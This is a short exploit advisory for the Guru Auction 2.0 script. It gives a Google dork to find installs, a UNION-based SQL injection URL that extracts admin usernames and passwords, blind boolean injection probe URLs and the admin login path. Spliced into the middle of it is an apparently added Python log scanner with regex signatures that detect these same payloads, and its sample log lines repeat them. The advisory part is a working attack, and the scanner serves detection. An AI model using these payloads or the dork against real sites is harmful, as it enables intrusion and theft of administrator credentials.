Guru Auction 2.0 Multiple SQL Injection Vulnerabilities.
Author : v3n0m5
Application : Guru Auction 2.0
Price : $49
Vendor : http://www.guruscript.com/
Google Dork : inurl:subcat.php?cate_id=
SQLi p0c:
~~~~~~~~~~
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
Blind SQLi p0c:
~~~~~~~~~~
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
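As an added example that is not part of the advisory: a small Python scanner that flags access-log requests carrying the two injection shapes shown above (UNION-based extraction via subcat.php?cate_id= and boolean-based blind probing via detail.php?item_id=). The log lines, host and paths are constructed; the signature names are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Patterns matched against the decoded, lowercased value of each query
# parameter. They mirror the PoC shapes above: UNION/select, group_concat
# and a trailing comment for extraction; AND ... SUBSTRING(...)=n and
# @@version for boolean-based blind probing.
SIGNATURES = {
    "union_select": re.compile(r"union\s+(?:all\s+)?select\b"),
    "group_concat": re.compile(r"group_concat\s*\("),
    "version_probe": re.compile(r"@@version"),
    "boolean_blind": re.compile(r"\b(?:and|or)\s+.*substring\s*\(.*\)\s*=\s*\d+"),
    "comment_tail": re.compile(r"--\s*$"),
}

# Request line inside an Apache/nginx combined-format access log entry.
LOG_LINE = re.compile(r'"(?:GET|POST) (?P<path>\S+) HTTP/[\d.]+"')

def scan_request(path):
    """Return the set of signature names that fire on one request path."""
    hits = set()
    # parse_qsl URL-decodes values ('+' -> space, %xx -> byte) and splits
    # only on the first '=' so 'SUBSTRING(...)=5' stays in the value.
    for _, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        decoded = value.lower()
        hits.update(name for name, pat in SIGNATURES.items() if pat.search(decoded))
    return hits

def scan_log(lines):
    """Map each suspicious request path to the signature names it triggered."""
    findings = {}
    for line in lines:
        m = LOG_LINE.search(line)
        if m:
            hits = scan_request(m.group("path"))
            if hits:
                findings[m.group("path")] = hits
    return findings

# Constructed sample log lines (hypothetical client IPs, paths and timestamps).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:12:00:01 +0000] "GET /shop/subcat.php?cate_id=12 HTTP/1.1" 200 5120',
    '10.0.0.7 - - [01/Jan/2024:12:00:02 +0000] "GET /shop/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin-- HTTP/1.1" 200 4098',
    '10.0.0.7 - - [01/Jan/2024:12:00:03 +0000] "GET /shop/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 HTTP/1.1" 200 7311',
    '10.0.0.7 - - [01/Jan/2024:12:00:04 +0000] "GET /shop/detail.php?item_id=575 HTTP/1.1" 200 7311',
]

if __name__ == "__main__":
    for path, hits in scan_log(SAMPLE_LOG).items():
        print(sorted(hits), path)
```

Benign requests (a plain numeric id) produce no hits, while both PoC shapes are flagged with the signature names that fired, which is the minimum a WAF rule or SIEM search for this vendor script should catch.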
Admin login entry:
~~~~~~~~~~
http://domain.tld/[path]/admin/